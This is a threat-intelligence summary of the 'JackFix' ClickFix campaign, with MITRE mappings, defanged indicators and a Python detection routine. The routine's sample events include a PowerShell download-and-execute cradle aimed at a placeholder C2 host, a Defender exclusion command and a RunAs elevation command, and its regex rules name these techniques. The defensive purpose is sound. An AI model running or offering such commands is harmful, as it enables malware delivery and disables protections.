Acronis TRU researchers uncovered a novel “JackFix” ClickFix campaign that hijacks the browser to display a convincing full‑screen fake Windows Update prompting victims to run malicious commands. The multistage attack (mshta → PowerShell downloader → final payloads) uses heavy obfuscation, UAC bombardment and a “spray and pray” downloader that executes up to eight payloads including Rhadamanthys and Vidar 2.0, and is detected and blocked by Acronis XDR at the PowerShell stage. #ClickFix #Rhadamanthys
Keypoints
- Novel “JackFix” ClickFix campaign hijacks the browser to show a full‑screen fake Windows Update UI to socially engineer victims into executing attacker commands.
- Initial lures mimic adult websites (xHamster/PornHub clones), likely distributed via malvertising or shady ads/pop‑unders, to pressure users into interacting with the page.
- Attack chain is multistage: mshta initial payload → large/obfuscated PowerShell second stage (loaders or downloaders) → final payloads (up to eight executed per infection).
- Extensive obfuscation: attackers obfuscate both payloads and the ClickFix/clipboard commands (hex arrays, CharCode/Base64, junk code) to evade detection and analysis.
- Privilege escalation via repeated UAC prompts and creation of Microsoft Defender exclusions to allow payloads to run with elevated rights.
- Final payloads include current stealer/RAT families (Rhadamanthys, Vidar 2.0, RedLine, Amadey), and the attackers design C2 endpoints to redirect to benign sites unless accessed via specific PowerShell commands.
MITRE Techniques
- [T1204] User Execution – Social engineering via adult‑site interaction: [‘Any interaction with the site, pressing any of the elements, or anywhere on the site itself, will set the browser to full screen and pop the fake Windows Update screen.’]
- [T1115] Clipboard Data – ClickFix leverages copying data into the clipboard to deliver payloads: [‘…makes these attacks much harder to detect… build the mechanism which copies the payload to the victim’s machine when they first enter the website.’]
- [T1059.001] Command and Scripting Interpreter: PowerShell – Second‑stage scripts are heavy PowerShell loaders/downloaders that fetch and execute payloads: [‘These PowerShell commands would often reach out to a malicious address via the irm or iwr commands, and would pull and execute a second stage.’]
- [T1218] Signed Binary Proxy Execution (mshta / msiexec) – Initial execution frequently uses mshta to run attacker‑controlled HTML/JS pages (and rarely msiexec): [‘The initial payload starts with a mshta command in all but a few variants of the attack.’]
- [T1027] Obfuscated Files or Information – Attackers obfuscate both the payloads and the ClickFix commands (hex arrays, Base64, CharCode, junk code) to evade detection: [‘Unusually, this campaign is not only obfuscating its payloads, but also the commands used to facilitate the ClickFix attack.’]
- [T1548] Abuse Elevation Control Mechanism – The second‑stage script repeatedly prompts UAC to obtain elevated privileges, looping until the user grants admin rights: [‘The script then loops continuously until the victim allows for the script to run as admin.’]
- [T1562.001] Impair Defenses: Disable or Modify Security Tools – Scripts create Microsoft Defender exclusions to allow malware execution: [‘The script begins by attempting to elevate privileges and creating exclusions for Microsoft Defender to allow the malware to run.’]
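Added detection example, not code from the Acronis report: a small Python triage routine that scores process-creation events for the chain the techniques above describe (mshta spawning PowerShell, irm/iwr download cradles, Defender exclusion creation, UAC elevation requests, CharCode/Base64/hex obfuscation). The event schema (parent_image, image, command_line), the rule weights and the sample events are assumptions; map the fields to your own Sysmon/4688/EDR telemetry.

```python
import re

# Each rule: (description, MITRE technique, weight, regex over the lowercased command line).
RULES = [
    ("irm/iwr download cradle", "T1059.001", 1,
     r"\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b"),
    ("Defender exclusion added", "T1562.001", 2,
     r"add-mppreference\s+-exclusion(path|process|extension)\b"),
    ("UAC elevation request", "T1548", 1, r"start-process\b.*-verb\s+runas\b"),
    ("CharCode/Base64/hex obfuscation", "T1027", 1,
     r"(\[char\]|frombase64string|-e(nc|ncodedcommand)?\s|(0x[0-9a-f]{2}\s*,\s*){3})"),
]

def score_event(event):
    """Return (score, [(description, technique)]) for one process-creation event."""
    parent = event.get("parent_image", "").lower()
    image = event.get("image", "").lower()
    cmd = event.get("command_line", "").lower()
    score, hits = 0, []
    # The chain's signature step: mshta (initial stage) spawning PowerShell.
    if parent.endswith("mshta.exe") and image.endswith(("powershell.exe", "pwsh.exe")):
        score, hits = 2, [("mshta spawning PowerShell", "T1218")]
    for desc, tid, weight, pat in RULES:
        if re.search(pat, cmd):
            score += weight
            hits.append((desc, tid))
    return score, hits

def triage(events, threshold=2):
    """Map pid -> (score, hits) for events whose score reaches the threshold."""
    flagged = {}
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            flagged[ev["pid"]] = (score, hits)
    return flagged

# Constructed sample events (not real telemetry); the C2 host is a placeholder.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 4120, "parent_image": r"C:\Windows\System32\mshta.exe", "image": PS,
     "command_line": 'powershell -w hidden -c "iex (irm http://c2.example.invalid/s)"'},
    {"pid": 4188, "parent_image": PS, "image": PS,
     "command_line": "powershell Start-Process powershell -Verb RunAs -ArgumentList ([char]65)"},
    {"pid": 4200, "parent_image": PS, "image": PS,
     "command_line": r"powershell Add-MpPreference -ExclusionPath C:\Users\Public"},
    {"pid": 5010, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": r"powershell Get-ChildItem C:\Users"},
]
```

Calling `triage(SAMPLE_EVENTS)` flags the three chain events (4120, 4188, 4200) and leaves the explorer-launched PowerShell at score zero; a lone Defender exclusion is weighted to reach the threshold on its own.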
Indicators of Compromise
- [Domain] Phishing/hosting/C2 domains used by the campaign – cmevents[.]pro, verificationsbycapcha[.]center, and 27 more domains (e.g., 3accdomain3[.]ru, cosmicpharma-bd[.]com, sportsstories[.]gr).
- [IP] Infrastructure/C2 addresses – 5[.]129[.]216[.]165, 94[.]74[.]164[.]136, and other attacker IPs used for hosting and payload delivery.
- [File name / extension] Initial and legacy payload artefacts – .odd files (used to deliver obfuscated JavaScript/PowerShell), pu.swf (vestigial Shockwave Flash component) as observed on phishing sites.
- [Malware / family] Final payloads observed in infections – Rhadamanthys, Vidar 2.0 (examples), and other families such as RedLine and Amadey (plus loaders/RATs and multiple additional samples executed per infection).